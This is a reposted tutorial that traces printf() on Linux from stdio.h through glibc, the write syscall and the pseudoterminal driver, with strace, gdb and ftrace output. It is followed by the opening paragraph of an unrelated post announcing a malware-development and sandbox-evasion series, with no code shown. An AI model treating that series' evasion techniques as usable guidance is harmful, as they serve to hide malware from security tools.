Tearing apart printf()

( Original text )

If ‘Hello World’ is the first program for C students, then printf() is probably the first function. I’ve had to answer questions about printf() many times over the years, so I’ve finally set aside time for an informal writeup. The common questions fit roughly in to two forms:

  • Easy: How does printf mechanically solve the format problem?
  • Complex: How does printf actually display text on my console?

My usual answer?
«Just open up stdio.h and track it down»

This wild goose chase is not only a great learning experience, but also an interesting test for the dedicated beginner. Will they come back with an answer? If so, how detailed is it? What IS a good answer?


printf() in 30 seconds — TL;DR edition

printf’s execution is tailored to your system and generally goes like this:

  1. Your application uses printf()
  2. Your compiler/linker produce a binary. printf is a load-time pointer to your C library
  3. Your C runtime fixes up the format and sends the string to the kernel via a generic write
  4. Your OS mediates the string’s access to its console representation via a device driver
  5. Text appears in your screen

…but you probably already knew all that.

This is the common case for user-space applications running on an off-the-shelf system. (Side-stepping virtual/embedded/distributed/real-mode machines for the moment).

A more complicated answer starts with: It depends — printf mechanics vary across long list of things: Your compiler toolchain, system architecture to include the operating system, and obviously how you’ve used it in your program. The diagram above is generally correct but precisely useless for any specific situation.

If you’re not impressed, that’s good. Let’s refine it.


printf() in 90 seconds — Interview question edition

  1. You include the <stdio.h> header in your application
  2. You use printf non-trivially in your app.
  3. Your compiler produces object code — printf is recognized, but unresolved
  4. The linker constructs the executable, printf is tagged for run-time resolution
  5. You execute your program. Standard library is mapped in the process address space
  6. A call to printf() jumps to library code
  7. The formatted string is resolved in a temporary buffer
  8. Standard library writes to the stdout buffered stream. Eventual kernel write entry
  9. Kernel calls a driver write operation for the associated console
  10. Console output buffer is updated with the new string
  11. Output text appears on your console

Sounds better? There’s still a lot missing, including any mention of system specifics. More things to think about (in no particular order):

  • Are we using static or dynamic linkage? Normally printf is run-time linked, but there are exceptions.
  • What OS is this? The differences between them are drastic — When/how is stdout managed? What is the console and how is it updated? What is the kernel entry/syscall procedure…
  • Closely related to the OS…what kind of executable is this? If ELF, we need to talk about the GOT / PLT. If PE (Windows), then we need an import directory.
  • What kind of terminal are you using? Standard laptop/desktop? University cluster over ssh? Is this a virtual machine?
  • This list could go on forever, and all answers affect what really happens behind the scenes.

Things to know before continuing

The next part is targeted for C beginners who want to explore how functions execute through a complex system. I’m keeping the discussion at a high-level so we can focus on how many parts of the problem contribute to a whole solution. I’ll provide references to source code and technical documents so readers can explore on their own. No blog substitutes for authoritative documentation.

Now for a more important question:
Why do beginners get stuck searching for a detailed answer about basic functions like printf()?

I’ll boil it down to three problems:

Not understanding the distinct roles of the compiler, standard library, operating system, and hardware. You can’t look at just one aspect of a system and expect to understand how a function like printf() works. Each component handles a part of the ‘printf’ problem and passes the work to the next using common interfaces along the way. C compilers try to adhere to the ISO C standards. Operating systems may also follow standards such as POSIX/SUS. Standardization streamlines interoperability and portability, but with the cost of code complexity. Beginners often struggle following the chain of code, especially when the standard requirements end and the ‘actual work’ begins between the interfaces. The common complaint: Too many seemingly useless function calls between the interface and the work. This is the price of interoperability and there’s no easy + maintainable + scalable way around it!

Not grasping [compile/link/load/run]-time dynamics. Manual static analysis has limits, and so following any function through the standard library source code inevitably leads to a dead end — an unresolved jump table, an opaque macro with multiple expansions, or a hard stop at the end: an ambiguous function pointer. In printf’s case, that would be *write, which the operating system promises will be exist at run-time. Modern compilers and OSs are designed to be multi-platform and thus every possible code path that could exist is visible prior to compilation. Beginners may get lost in a code base where much of the source ‘compiles away’ and functions resolve dynamically at execution. Trivial case: If you call printf() on a basic string without formats, your compiler may emit a call to ‘puts’, discarding your printf entirely!

Not enough exposure to common abstractions used in complex software systems. Tracing any function through the compiler and OS means working through many disparate ideas in computing. For instance, many I/O operations involve the idea of a character stream. Buffering character I/O with streams has been part of Unix System V since the early 1980s, thanks in part to Dennis Ritchie, co-author of ‘The C Programming Language’. Since the 1990s, multiprocessing has become the norm. Tracing printf means stepping around locks, mutexes, semaphores, and other synchronization tools. More recently, i18n has upped the ante for simple console output. All these concepts taken together often distract and overwhelm beginners who are simply trying to understand one core problem.

Bottom line: Compilers, libraries, operating systems, and hardware are complex; we need to understand how each works together as a system in order to truly understand how printf() works.


printf() in 1000 seconds — TMI edition

(or ‘Too-specific-to-apply-to-any-system-except-mine-on-the-day-I-wrote-this edition’)

The best way to answer these questions is to work through the details on an actual system.

$uname -a
Linux localhost.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

$gcc --version
gcc (GCC) 4.8.5 20150623 (Red Hat 4.8.5-16)
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

$ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

Key points:


Step 0 — What is printf?

printf() is an idea that the folks at Bell Labs believed in as early as 1972: A programmer should be able to produce output using various formats without understanding exactly what’s going on under the hood.

This idea is merely an interface.

The programmer calls printf and the system will handle the rest. That is why you’re presumably reading this article — hiding implementation details works!

Early compilers supported programmers exclusively through built-in functions. When toolchains became a business in the early 1980s (Manx/Aztec C, Lattice C), many provided C and ASM source code for common functions that developers could #include in their projects as needed. This allowed customization of built-ins at the application level — no more rebuilding your toolchain for each project. However, programmers were still at the mercy of various brands of compilers, each bringing their own vision of how to implement these functions and run-time.

Thankfully, most of this hassel has gone away today. So if you want to use printf…


Step 1 — Include the <stdio.h> header

Goal: Tap into the infinite power of the C standard library

The simple line of code #include <stdio.h> is possible across the vast majority of computer systems thanks to standards. Specifically, ISO-9899.

In 1978, Brian Kernighan and Dennis Ritchie described printf in its full variadic form to include nine types of formats:

printf(control, arg1, arg2, ...);    # K&R (1st ed.)

This was as close as the industry would get to a standard for the next decade. Between 1983 and 1989, the ANSI committee worked on the formal standard that eventually brought the printf interface to its familiar form:

int printf(const char *format, ...);   # ANSI C (1989)

Here’s an oft-forgotten bit of C trivia: printf returns a value (the actual character output count). The interface from 1978 didn’t mention a return value, but the implied return type is integer under K&R rules. The earliest known compiler (linked above) did not return any value.

The most recent C standard from 2011 shows that the interface changed by only one keyword in the intervening 20 years:

int printf(const char * restrict format, ...);  # Latest ISO C (2011)

‘restrict’ (a C99 feature) allows the compiler to optimize without concern for pointer aliasing.

Over the past 40 years, the interface for printf is mostly unchanged, thus highly backwards compatible. However, the feature set has grown quite a bit:

1972 1978 1989 2011
%d — decimal Top 3 from ’72 All from ’78 plus… Too many!
%o — octal %x — hexadecimal %i — signed int Read
%s — string %u — unsigned decimal %p — void pointer the
%p — string ptr %c — byte/character %n — output count manual
%e,f,g — floats/dbl %% — complete form pp. 309-315

Step 2 — Use printf() with formats

Goal: Make sure your call to printf actually uses printf()

We’ll test out printf() with two small plagarized programs. However, only one of them is truly a candidate to trace printf().

Trivial printf() — printf0.c Better printf() — printf1.c
$ cat printf0.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World\n");
  return 0;
}     
$ cat printf1.c
#include <stdio.h>

int main(int argc, char **argv)
{
  printf("Hello World %d\n",1);
  return 0;
}

The difference is that printf0.c does not actually contain any formats, thus there is no reason to use printf. Your compiler won’t bother to use it. In fact, you can’t even disable this ‘optimization’ using GCC -O0 because the substitution (fold) happens during semantic analysis (GCC lingo: Gimplification), not during optimization. To see this in action, we must compile!

Possible trap: Some compilers may recognize the ‘1’ literal used in printf1.c, fold it in to the string, and avoid printf() in both cases. If that happens to you, substitute an expression that must be evaluated.


Step 3 — Compiler produces object code

Goal: Organize the components (symbols) of your application

Compiling programs results in an object file, which contains records of every symbol in the source file. Each .c file compiles to a .o file but none of seen any other files (no linking yet). Let’s look at the symbols in both of the programs from the last step.

Trivial printf() More useful printf()
$ gcc printf0.c -c -o printf0.o
$ nm printf0.o
0000000000000000 T main
                 U puts
$ gcc printf1.c -c -o printf1.o
$ nm printf1.o
0000000000000000 T main
                 U printf

As expected, the trivial printf usage has a symbol to a more simple function, puts. The file that included a format instead as a symbol for printf. In both cases, the symbol is undefined. The compiler doesn’t know where puts() or printf() are defined, but it knows that they exist thanks to stdio.h. It’s up to the linker to resolve the symbols.


Step 4 — Linking brings it all together

Goal: Build a binary that includes all code in one package

Let’s compile and linking both files again, this time both statically and dynamically.

$ gcc printf0.c -o printf0            # Trivial printf dynamic linking
$ gcc printf1.c -o printf1            # Better printf dynamic linking
$ gcc printf0.c -o printf0_s -static  # Trivial printf static linking
$ gcc printf1.c -o printf1_s -static  # Better printf static linking

Possible trap: You need to have the static standard library available to statically link (libc.a). Most systems already have the shared library built-in (libc.so). Windows users will need a libc.lib and maybe a libmsvcrt.lib. I haven’t tested in an MS environment in a while.

Static linking pulls all the standard library object code in to the executable. The benefit for us is that all of the code executed in user space is now self-contained in this single file and we can easily trace to see the standard library functions. In real life, you rarely want to do this. This disadvantages are just too great, especially for maintainability. Here’s an obvious disadvantage:

$ ls -l printf1*
total 1696
-rwxrwxr-x. 1 maiz maiz   8520 Mar 31 13:38 printf1     # Dynamic
-rw-rw-r--. 1 maiz maiz    101 Mar 31 12:57 printf1.c
-rw-rw-r--. 1 maiz maiz   1520 Mar 31 13:37 printf1.o
-rwxrwxr-x. 1 maiz maiz 844000 Mar 31 13:40 printf1_s   # Static

Our test binary blew up from 8kb to 844kb. Let’s take a look at the symbol count in each:

$ nm printf1.o | wc -l
2                      # Object file symbol count (main, printf)
$ nm printf1 | wc -l
34                     # Dynamic-linked binary symbol count
$ nm printf1_s | wc -l
1873                   # Static-linked binary symbol count

Our original, unlinked object file had just the two symbols we already saw (main and printf). The dynamic-linked binary has 34 symbols, most of which correspond to the C runtime, which sets up the environment. Finally, our static-linked binary has nearly 2000 symbols, which include everything that could be used from the standard library.

As you may know, this has a significant impact on load-time and run-time


Step 5 — Loader prepares the run-time

Goal: Set up the execution environment

The dynamic-linked binary has more work to do than its static brother. The static version included 1873 symbols, but the dynamic binary only inluded 34 with the binary. It needs to find the code in shared libraries and memory map it in to the process address space. We can watch this in action by using strace.

Dynamic-linked printf() syscall trace

$ strace ./printf1
execve("./printf1", ["./printf1"], [/* 47 vars */]) = 0
brk(NULL) = 0x1dde000
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce82000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=83694, ...}) = 0
mmap(NULL, 83694, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f59bce6d000
close(3) = 0
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2127336, ...}) = 0
mmap(NULL, 3940800, ..., 3, 0) = 0x7f59bc89f000
mprotect(0x7f59bca57000, 2097152, PROT_NONE) = 0
mmap(0x7f59bcc57000, 24576, ..., 3, 0x1b8000) = 0x7f59bcc57000
mmap(0x7f59bcc5d000, 16832, ..., -1, 0) = 0x7f59bcc5d000
close(3) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce6c000
mmap(NULL, 8192, ..., -1, 0) = 0x7f59bce6a000
arch_prctl(ARCH_SET_FS, 0x7f59bce6a740) = 0
mprotect(0x7f59bcc57000, 16384, PROT_READ) = 0
mprotect(0x600000, 4096, PROT_READ) = 0
mprotect(0x7f59bce83000, 4096, PROT_READ) = 0
munmap(0x7f59bce6d000, 83694) = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7f59bce81000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

Each line is a syscall. The first is just after bash clones in to printf1_s, and the write syscall is near the bottom. The 21 syscalls between brk and the final fstatare devoted to loading shared libraries. This is the load-time penalty for dynamic-linking. Don’t worry if this seems like a mess, we won’t be using it. If you’re interested in more detail, here is the full dump with walkthrough

Now let’s look at the memory map for the process

Dynamic-linked printf() memory map

$ cat /proc/3177/maps
00400000-00401000 r-xp 00000000         ./printf1
00600000-00601000 r--p 00000000         ./printf1
00601000-00602000 rw-p 00001000         ./printf1
7f59bc89f000-7f59bca57000 r-xp 00000000 /usr/lib64/libc-2.17.so
7f59bca57000-7f59bcc57000 ---p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc57000-7f59bcc5b000 r--p 001b8000 /usr/lib64/libc-2.17.so
7f59bcc5b000-7f59bcc5d000 rw-p 001bc000 /usr/lib64/libc-2.17.so
7f59bcc5d000-7f59bcc62000 rw-p 00000000  
7f59bcc62000-7f59bcc83000 r-xp 00000000 /usr/lib64/ld-2.17.so
7f59bce6a000-7f59bce6d000 rw-p 00000000  
7f59bce81000-7f59bce83000 rw-p 00000000  
7f59bce83000-7f59bce84000 r--p 00021000 /usr/lib64/ld-2.17.so
7f59bce84000-7f59bce85000 rw-p 00022000 /usr/lib64/ld-2.17.so
7f59bce85000-7f59bce86000 rw-p 00000000  
7fff89031000-7fff89052000 rw-p 00000000 [stack]
7fff8914e000-7fff89150000 r-xp 00000000 [vdso]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

Our 8kb binary fits in to three 4kb memory pages (top three lines). The standard library has been mapped in to the ~middle of the address space. Code execution begins in the code area at the top, and jumps in to the shared library as needed.

This is the last I’ll mention the dynamic-linked version. We’ll use the static version from now on since it’s easier to trace.

Static-linked printf() syscall trace

$ strace ./printf1_s
execve("./printf1_s", ["./printf1_s"],[/*47 vars*/]) = 0
uname({sysname="Linux", nodename="...", ...}) = 0
brk(NULL) = 0x1d4a000
brk(0x1d4b1c0) = 0x1d4b1c0
arch_prctl(ARCH_SET_FS, 0x1d4a880) = 0
brk(0x1d6c1c0) = 0x1d6c1c0
brk(0x1d6d000) = 0x1d6d000
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap(NULL, 4096, ..., -1, 0) = 0x7faad3151000
write(1, "Hello World 1\n", 14Hello World 1) = 14
exit_group(0) = ?
+++ exited with 0 +++

The static-linked binary uses far fewer syscalls. I’ve highlighted three of them near the bottom: fstatmmap, and write. These occur during printf(). We’ll trace this better in the next step. First, let’s look at the static memory map:

Static-linked printf() memory map

$ cat /proc/3237/printf1_s
00400000-004b8000 r-xp 00000000         ./printf1_s
006b7000-006ba000 rw-p 000b7000         ./printf1_s
006ba000-006df000 rw-p 00000000         [heap]
7ffff7ffc000-7ffff7ffd000 rw-p 00000000 
7ffff7ffd000-7ffff7fff000 r-xp 00000000 [vdso]
7ffffffde000-7ffffffff000 rw-p 00000000 [stack]
ffffffffff600000-ffffffffff601000 r-xp  [vsyscall]

No hint of a shared library. That’s because all the code is now included on the first two lines within the printf1_s binary. The static binary is using 187 pages of memory, just short of 800kb. This follows what we know about the large binary size.

Now we’ll move on to the more interesting part: execution.


Step 6 — printf call jumps to the standard library

Goal: Follow the standard library call sequence at run-time

The programmer shapes code for the printf interface then the run-time library bridges the standard API and the OS interface.

Key point: A compiler/library is free to handle logic any way it wants between interfaces. After printf is called, there is no standard defined procedure required, except that the correct output is produced and within certain boundaries. There are many possible paths to the output, and every toolchain handles it differently. In general, this work is done in two parts: A platform-independent side where a call to printf solves the format substitution problem (Step-6, Step 7). The other is a platform-dependent side, which calls in to the OS kernel using the properly-formatted string (Step 8).

The next three steps will focus solely on the static-linked version of printf. It’s less tedious to trace static-linked source, especially through the kernel in the next few steps. Note that the number of instructions executed between both are ~2300 for dynamic and ~1600 for static.

In addition to printf, compliant C compilers also implement:

fprintf() — A generalized version of printf except the output can go to any file stream, not just the console. fprintf is notable the C standard defines supported format types in its description. fprintf() isn’t used, but it’s good to know about since it’s related to the next function

vfprintf() — Similar to fprintf except the variadic arguments are reduced to a single pointer to a va_list. libc does almost all printing work in this function, including format replacement. (f)printf merely calls vfprintf almost immediately. vfprintf then uses the libio interface to write final strings to streams.

These high-level print functions obey buffering rules defined on the stream descriptor. The output string is constructed in the buffer using internal GCC (libio) functions. Finally, write is the final step before handing work to the kernel. If you aren’t familiar with how these work, I recommend reading about the GCC wayof managing I/O

Bonus: Some extra reading about buffering with nice diagrams

Let’s trace our path through the standard library

printf() execution sequence …printf execution continued
$ gdb ./printf1_s … main at printf1.c:5 5 printf(«Hello World %d\n», 1); 0x400e02 5 printf(«Hello World %d\n», 1); 0x401d30 in printf () 0x414600 in vfprintf () 0x40c110 in strchrnul () 0x414692 in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x425ce0 in _IO_doallocbuf () 0x4614f0 in _IO_file_doallocate () 0x4235d0 in _IO_file_stat () 0x40f8b0 in _fxstat ()   ### fstat syscall 0x461515 in _IO_file_doallocate () 0x410690 in mmap64 ()   ### mmap syscall 0x46155e in _IO_file_doallocate () 0x425c70 in _IO_setb () 0x461578 in _IO_file_doallocate () 0x425d15 in _IO_doallocbuf () 0x424d38 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x425dc0 in _IO_default_xsputn () …cut 11 repeats of last 2 functions… 0x425e7c in _IO_default_xsputn () 0x423d02 in _IO_new_file_xsputn () 0x41475e in vfprintf () 0x414360 in _itoa_word () 0x4152bb in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x41501f in vfprintf () 0x40c110 in strchrnul () 0x414d1e in vfprintf () 0x423c10 in _IO_new_file_xsputn () 0x40b840 in mempcpy () 0x423c6d in _IO_new_file_xsputn () 0x424ba0 in _IO_new_file_overflow () 0x4243c0 in _IO_new_do_write () 0x4235e0 in _IO_new_file_write () 0x40f9c7 in write () 0x40f9c9 in __write_nocancel ()   ### write syscall happens here 0x423623 in _IO_new_file_write () 0x42443c in _IO_new_do_write () 0x423cc1 in _IO_new_file_xsputn () 0x414d3b in vfprintf () 0x408450 in free () 0x41478b in vfprintf () 0x408450 in free () 0x414793 in vfprintf () 0x401dc6 in printf () main at printf1.c:6

This call trace shows the entire execution for this printf example. If you stare closely at this code trace, we can follow this basic logic:

  • printf passes string and formats to vfprintf
  • vfprintf starts to parse and attempts its first buffered write
  • Oops — buffer needs to be allocated. Let’s find some memory
  • vfprintf back to parsing…
  • Copy some results to a final location
  • We’re done — call write()
  • Clean up this mess

Let’s look at some of the functions:

_IO_*These functions are part of GCC’s libio module, which manage the internal stream buffer. Just looking at the names, we can guess that there is a lot of writing and memory allocation. The source code for most of these operations is in the files fileops.c and genops.c.

_fxstat pulls the state of file descriptors. Since this is system dependent, it’s located at /sysdeps/unix/sysv/linux/fxstat64.c.

The remaining functions are covered in detail in the next two steps.

Let’s dig more!


Step 7 — Format string resolved

Goal: Solve the format problem

Let’s think about our input string, Hello World %d\n. There are three distinct sections that need to be processed as we scan across is from left to right.

  • 'Hello World ' — simple put
  • %d — substitute the integer literal ‘1’
  • \n — simple put

Now referring back to our trace, we can find three code sections that suggest where to look for the formatting work:

0x400e02 5  printf("Hello World %d\n", 1);
0x401d30 in printf ()
0x414600 in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414692 in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering 'Hello World '
...
0x41475e in vfprintf ()
0x414360 in _itoa_word ()          # converting integer
0x4152bb in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '1'
...
0x41501f in vfprintf ()
0x40c110 in strchrnul ()           # string scanning
0x414d1e in vfprintf ()
0x423c10 in _IO_new_file_xsputn () # buffering '\n'
...

A few function calls after that final vfprintf() call is the hand off to the kernel. The formatting must have happened in vfprintf between the instructions indicated above. All substitutions handed pointers to the finished string to libio for line buffering. Let’s take a peek at the first round only:

The hand off to xsputn requires vfprintf to identify the start location in the string and a size. The start is already known (current position), but it’s up to strchrnul() to find a pointer to the start of the next ‘%’ or the end of string. We can follow the parsing rules in GCC source code (/stdio-common/printf-*).

from glibc/stdio-common/printf-parse.h:

/* Find the next spec in FORMAT, or the end of the string.  Returns
   a pointer into FORMAT, to a '%' or a '\0'.  */
__extern_always_inline const unsigned char *
__find_specmb (const unsigned char *format)
{
  return (const unsigned char *) __strchrnul ((const char *) format, '%');
}

Or we can look in the compiled binary (my preferred timesink):

in vfprintf:
  0x414668 <+104>: mov    esi,0x25   # Setting ESI to the '%' symbol
  0x41466d <+109>: mov    rdi,r12    # Pointing RDI to the format string
  ...saving arguments...
  0x41468d <+141>: call   0x40c110 <strchrnul> # Search for next % or end

in strchrnul:
  0x40c110 <+0>: movd   xmm1,esi   # Loading up an SSE register with '%'
  0x40c114 <+4>: mov    rcx,rdi    # Moving the format string pointer
  0x40c117 <+7>: punpcklbw xmm1,xmm1 # Vector-izing '%' for a fast compare
  ...eventual return of a pointer to the next token...

Long story short, we’ve located where formats are found and processed.

That’s going to be the limit of peeking at source code for glibc. I don’t want this article to become an ugly mess. In any case, the buffer is ready to go after all three format processing steps.


Step 8 — Final string written to standard output

Goal: Follow events leading up to the kernel syscall

The formatted string, «Hello World 1», now lives in a buffer as part of the stdout file stream. stdout to a console is usually line buffered, but exceptions do exist. All cases for console stdout eventually lead to the ‘write’ syscall, which is prototyped for the particular system. UNIX(-like) systems conform to the POSIX standard, if only unofficially. POSIX defines the write syscall:

ssize_t write(int fildes, const void *buf, size_t nbyte);

From the trace in step 6, recall that the functions leading up to the syscall are:

0x4235e0 in _IO_new_file_write ()  # libio/fileops.c
0x40f9c7 in write ()               # sysdeps/unix/sysv/linux/write.c
0x40f9c9 in __write_nocancel ()    # various macros in libc and linux
  ### write syscall happens here

The link between the compiler and operating system is the ABI, and is architecture dependent. That’s why we see a jump from libc’s libio code to our test case architecture code under (gcc)/sysdeps. When your standard library and OS is compiled for your system, these links are resolved and only the applicable ABI remains. The resulting write call is best understood by looking at the object code in our program (printf1_s).

First, let’s tackle one of the common complaints from beginners reading glibc source code…the 1000 difference ways write() appears. At the binary level, this problem goes away after static-linking. In our case, write() == __write() == __libc_write()

$ nm printf1_s | grep write
6b8b20 D _dl_load_write_lock
41f070 W fwrite
400575 t _i18n_number_rewrite
40077f t _i18n_number_rewrite
427020 T _IO_default_write
4243c0 W _IO_do_write
4235e0 W _IO_file_write
41f070 T _IO_fwrite
4243c0 T _IO_new_do_write
4235e0 T _IO_new_file_write
421c30 T _IO_wdo_write
40f9c0 T __libc_write     ## Real write in symbol table
43b220 T __libc_writev
40f9c0 W write            ## Same address -- weak symbol
40f9c0 W __write          ## Same address -- weak symbol
40f9c9 T __write_nocancel
43b220 W writev
43b220 T __writev

So any reference to these symbols actually jumps to the same executable code. For what it’s worth, writev() == __writev(), and fwrite() == _IO_fwrite

And what does __libc_write look like…?

000000000040f9c0 <__libc_write>:
  40f9c0:  83 3d c5 bb 2a 00 00   cmpl   $0x0,0x2abbc5(%rip)  # 6bb58c <__libc_multiple_threads>
  40f9c7:  75 14                  jne    40f9dd <__write_nocancel+0x14>

000000000040f9c9 <__write_nocancel>:
  40f9c9:	b8 01 00 00 00       	mov    $0x1,%eax
  40f9ce:	0f 05                	syscall 
  ...cut...

Write simply checks the threading state and, assuming all is well, moves the write syscall number (1) in to EAX and enters the kernel.

Some notes:

  • x86-64 Linux write syscall is 1, old x86 was 4
  • rdi refers to stdout
  • rsi points to the string
  • rdx is the string size count

Step 9 — Driver writes output string

Goal: Show the execution steps from syscall to driver

Now we’re in the kernel with rdi, rsi, and rdx holding the call parameters. Console behavior in the kernel depends on your current environment. Two opposing cases are if you’re printing to native console/CLI or in a desktop pseudoterminal, such as GNOME Terminal.

I tested both types of terminals on my system and I’ll walk through the desktop pseudoterminal case. Counter-intuitively, the desktop environment is easier to explain despite the extra layers of work. The PTY is also much faster — the process has exclusive use of the pty where as many processes are aware of (and contend for) the native console.

We need to track code execution within the kernel, so let’s give Ftrace a shot. We’ll start by making a short script that activates tracing, runs our program, and deactivates tracing. Although execution only lasts for a few milliseconds, that’s long enough to produce tens or hundreds of thousands of lines of kernel activity.

#!/bin/sh
echo function_graph > /sys/kernel/debug/tracing/current_tracer
echo 1 > /sys/kernel/debug/tracing/tracing_on
./printf1_s
echo 0 > /sys/kernel/debug/tracing/tracing_on
cat /sys/kernel/debug/tracing/trace > output

Here is what happens after our static-linked printf executes the write syscall in a GNOME Terminal:

7)           | SyS_write() {
7)           |  vfs_write() {
7)           |   tty_write() {
7) 0.053 us  |    tty_paranoia_check();
7)           |    n_tty_write() {
7) 0.091 us  |     process_echoes();
7)           |     add_wait_queue()
7) 0.026 us  |     tty_hung_up_p();
7)           |     tty_write_room()
7)           |     pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |       queue_work_on()
7)+10.288 us |      } /* tty_flip_buffer_push */
7)           |      tty_wakeup() 
7)+14.687 us |     } /* pty_write */
7)+57.252 us |    } /* n_tty_write */
7)+61.647 us |   } /* tty_write */
7)+64.106 us |  } /* vfs_write */
7)+64.611 us | } /* SyS_write */

This output has been culled to fit this screen. Over 1000 lines of kernel activity were cut within SyS_write, most of which were locks and the kernel scheduler. The total time spent in kernel is 65 microseconds. This is in stark contrast to the native terminal, which took over 6800 microseconds!

Now is a good time to step back and think about how pseudoterminals are implemented. As I was researching a good way to explain it, I happened upon an excellent write up by Linus Åkesson. He explains far better than I could. This diagram he drew up fits our case perfectly.

The TL;DR version is that pseudoterminals have a master and a slave side. A TTY driver provides the slave functionality while the master side is controlled by a terminal process.

Let’s demonstrate that on my system. Recall that I’m testing through a gnome-terminal window.

$ ./printf1_s
Hello World 1
^Z
[1]+  Stopped                 ./printf1_s
$ top -o TTY
printf tty/pts usage

bash is our terminal parent process using pts/0. The shell forked (cloned) top and printf. Both inherited the bash stdin and stdout.

Let’s take a closer look at the pts/0 device the kernel associates with our printf1_s process.

$ ls -l /dev/pts/0
crw--w----. 1 maizure tty 136, 0 Apr  1 09:55 /dev/pts/0

Notice that the pseudoterminal itself is associated with a regular tty device. It also has a major number 136. What’s that?

From this linux kernel version sourceinclude/uapi/linux/major.h

...
#define UNIX98_PTY_MASTER_MAJOR	128
#define UNIX98_PTY_MAJOR_COUNT	8
#define UNIX98_PTY_SLAVE_MAJOR	(UNIX98_PTY_MASTER_MAJOR+UNIX98_PTY_MAJOR_COUNT)
...

Yes, this major number is associated with a pseudoterminal slave (Master = 128, Slave = 128 + 8 = 136). A tty driver is responsible for its operation. If we revisit our write syscall trace, this makes sense:

...cut from earlier
7)           |  pty_write() {
7)           |      tty_insert_flip_string_fixed_flag()
7)           |      tty_flip_buffer_push() {
7)           |          queue_work_on()
7)+10.288 us |      }
7)           |      tty_wakeup() 
7)+14.687 us |  } /* pty_write */
...

The pty_write() function invokes tty_* operations, which we assume moves ‘Hello World 1’ to the console. So where is this console?


Step 10 — Console output buffer is updated

Goal: Put the string to the console attached to stdout

The first argument to pty_write is struct tty_struct *ttyThis struct contains the console, which is created with each unique tty process. In this case, the parent terminal created the pts/0 console and each child simply points to it.

The tty has many interesting parts to look at: line discipline, driver operations, the tty buffer(s), the tty_port. In the interest of space, I’m not going to cover tty initialization since it’s not on the direct path for printf — the process was created, the tty exists, and it wants this ‘Hello World 1’ right now!

The string is copied to the input queue in tty_insert_flip_string_fixed_flag().

memcpy(tb->char_buf_ptr + tb->used, chars, space); 
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space;
copied += space;
chars += space;

This moves the data and flags to the current flip buffer. The console state is updated and the buffer is pushed:

if (port->low_latency)
    flush_to_ldisc(&buf->work);
else
    schedule_work(&buf->work);

Then the line discipline is notified to add the new string to the output window in tty_wakeup(). The typical case involves a kernel work queue, which is necessarily asynchronous. The string is waiting in the buffer with the signal to go. Now it’s up to the PT master to process it.

Our master is the gnome_temrinal, which manages the window context we see on screen. The buffer will eventually stream to the console on the kernel’s schedule. In a native console (not X server), this would be a segment of raw video memory. Once the pty master processes the new data…


Step 11 — Hello world!

Goal: Rejoice

$ ./printf1_s
Hello World 1

$

Success!
Now you know how it works on my system. How about yours?


FAQ

Why did you put this article together?
Recently, I was asked about how some functions are implemented several times over a short period and I couldn’t find a satisfactory resource to point to. Many blog posts focused too much on digging through byzantine compiler source code. I found that approach unhelpful because the compiler and standard library are only one part of the problem. This system-wide approach gives beginners a foundation, a path to follow, and helpful experiments to adapt to their own use.

What did you leave out?
Too much! It’ll have to wait until ‘printf() in 2500 seconds’. In no particular order:

  • Details about how glibc implements buffering
  • Details of how the GNOME console manages the terminal context
  • Flip buffer mechanics for ttys (similar to video backbuffers)
  • More about Linux work queues used in the tty driver
  • More discussion of how this process varies among architectures
  • Last (and definitely least): Untangling the mess inside vfprintf

How did you get gdb to print out that trace in step 6?
I used a separate file for automating gdb input and captured the output to another file.

$cat gdbcmds
start
stepi
stepi
stepi
stepi
...about 1000 more stepi...

$gdb printf1_s -x gdbcmds > printf1_s_dump
Реклама

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

